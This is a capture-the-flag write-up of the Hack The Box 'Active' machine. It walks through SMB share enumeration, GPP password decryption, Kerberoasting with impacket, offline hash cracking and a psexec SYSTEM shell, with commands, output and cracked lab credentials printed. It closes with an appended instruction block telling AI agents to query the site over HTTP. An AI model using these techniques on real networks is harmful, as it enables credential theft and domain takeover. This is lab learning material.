# Active ## IP * LHOST: 10.10.14.15 * RHOST: 10.129.135.20 ## Nmap Port scan: ``` PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown ``` Script scan: ``` PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-09 14:08:09Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.1: |_ Message signing enabled and required | smb2-time: | date: 2022-07-09T14:09:11 |_ start_date: 2022-07-09T14:05:50 ``` Full scan: ``` PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49169/tcp open unknown 49171/tcp open unknown 49177/tcp open unknown Making a script scan on extra ports: 5722, 9389, 47001, 49169, 49171, 49177 PORT STATE SERVICE VERSION 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49169/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 49177/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## User Flag (SMB Info Leak, GPP) ### SMB Null Session Enumerate SMB shares: ```shell $ smbmap -H $IP [+] IP: 10.129.135.20:445 Name: 10.129.135.20 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS ``` Recursively list directories and files in the share `\Replication`: ```shell smbmap -H $IP -R Replication --depth 10 ``` Note that the `--depth` flag is needed, otherwise we won't find the thing we want. Here we found an interesting file named `Groups.xml`: ![Groups.xml](/files/zLln6fLlZD7uHUcxjHfr) Download `Groups.xml` to Kali: ```shell smbmap -H $IP -R Replication --depth 10 -A Groups.xml -q ``` In `Groups.xml`, we found a username `active.htb\SVC_TGS` and a GPP password in the `cpassword` field: ``` edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ``` ### GPP Password Decryption GPP password can be easily decrypted with Kali built-in `gpp-decrypt` tool: ```shell gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ``` The plaintext password is `GPPstillStandingStrong2k18`. To learn the theory of this attack, read the following post: {% embed url="" %} Finding Passwords in SYSVOL & Exploiting Group Policy Preferences {% endembed %} ### SMB Enumeration with Credential Enumerate the SMB shares again with the credential we just obtained: ```shell $ smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' [+] IP: 10.129.135.20:445 Name: 10.129.135.20 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share Replication READ ONLY SYSVOL READ ONLY Logon server share Users READ ONLY ``` Recursively list directories and files in the share `\Users`: ```shell smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 ``` Here we found `user.txt`. Download it to Kali: ```shell smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 -A user.txt -q ``` ## Root Flag (Kerberoast) Now we have a valid username `SVC_TGS` and its plaintext password `GPPstillStandingStrong2k18`. In such scenario, we can try **Kerberoast** in order to get a TGS ticket and crack it offline. To learn the theory behind Kerberoast, read the following post: {% embed url="" %} How To Attack Kerberos 101 {% endembed %} Do kerberoast with GetUserSPNS: ```shell $ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-07-09 10:06:56.849348 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cff428e912c5afd03d8a2eb0aedfd97b$0b418bf29e27f1495c342e8a8be1bf0882f1a0c50c4e11971114f0221f54177dd5d1309936fdd123e087edef99ba2686cfae610d754fdd0d1abb35b718eb9604f66446c886bd468591aae0d229ece0935dcbd67187656f2e2ae6c5a0d52b2822dacdc2aff41554ce63e4ab76deb5fbe0488efea8371c5aae296bcd4db4cdbfb9372a199d72bba3d8bc14de863c48a581ca3e6e390aa2e1df01d7cacf000b3a70a764beafb01981e4af936dadb31fa173482a98c31081f96a763bad17c54602e411ed6851d432d2a124267fba0ab962ae9ca441133018051288f52376709e5420fee498f17e8e6eed20116a3075e284dcb06e7a4aed71804321c4743dfcf4a9277a93709863579380393ac206f3f45636fd30c78779a51b8b8bd2a49a2beab2dc2d0be832cc10623da976ae9dd9ce8c3a8d78e8af3bf9119b5486374914ea53b912e45e1b3c794712d407333cf1b570adfac84e3436f359ea5d3af494721d8dd5224bb7833a78b86b2858f34c17911e67aaa8448a34891c8fa595ac183fb8f4ca3de974af002a0eb1cea6a6dc69c1cab81381b4b5d067ee79d5c6afd69f60a501b07685059bb515eeb9e13f9dbd6ef13410f06e92c697706680766af6878b7ad230bfb9df5224f3d7db9ac160d91b719fd506b2af28533ec9e7c30151b86cc80a9afb33f623bb9859efcb16c9a2d78e92d545450c7bf6dad4dda042ab267e3557f1b144a36411666ddaf078707b09567c19cf505bfb3da72d50d2317f5610597855376965201285ab1818db0bde667f02c266f9a559492687d2e99b5f930ce4d190d80ac123877f283ee33f6f4819de904a42d0891fc7f6dd6cc067891d5aa95b0ff4ecdd0550ee8546dce2859410415a743b835cefef97b0fb809345448a49f53fb2b77efd9349e3aa47dfd0af266e35f07c22b6d2af022f7b6ec81477bcbb7b3de03a4d35810e3c50da0ad6aafa107e854b31dccfc95f2670305863f8625ecaecd5ab4b80afcfc81a0ff6b6e4d8fc0cd91ff8c7c40a0eeee29c1df1ce1f7fa091ff4819afb2b26ab49180efe9b5c199051eb03115ffee9be164aba38ce90f9defef6c76fc962d360cdf2a55734a1c5f874032e2e39c898e104973c789144f176f1c47c693c5e7bfc2e65df72269b3fdcbf863db4432c4ea7daa71be172e97b061aa83e35efb39d0dcf84e7d4c28675e4e0041fb63d63b0f7e32e29fdb00e93259aa8c504200c817b946f53f32f32a8091cd5650edfd39184a28 ``` Save the TGS ticket to a file named `hash.txt`: ```shell impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request -outputfile hash.txt ``` Crack the TGS ticket with John: ```shell john-rockyou hash.txt ``` The plaintext password is `Ticketmaster1968`: ![John](/files/HKa5cBKca8rFplO53vuc) PsExec to SYSTEM shell: ```shell impacket-psexec active.htb/Administrator:Ticketmaster1968@$IP ``` ![SYSTEM shell](/files/rZf5nJJp5dr3mNmDB5AQ) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfwriteup/red-teaming/hack-the-box/ad/active.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.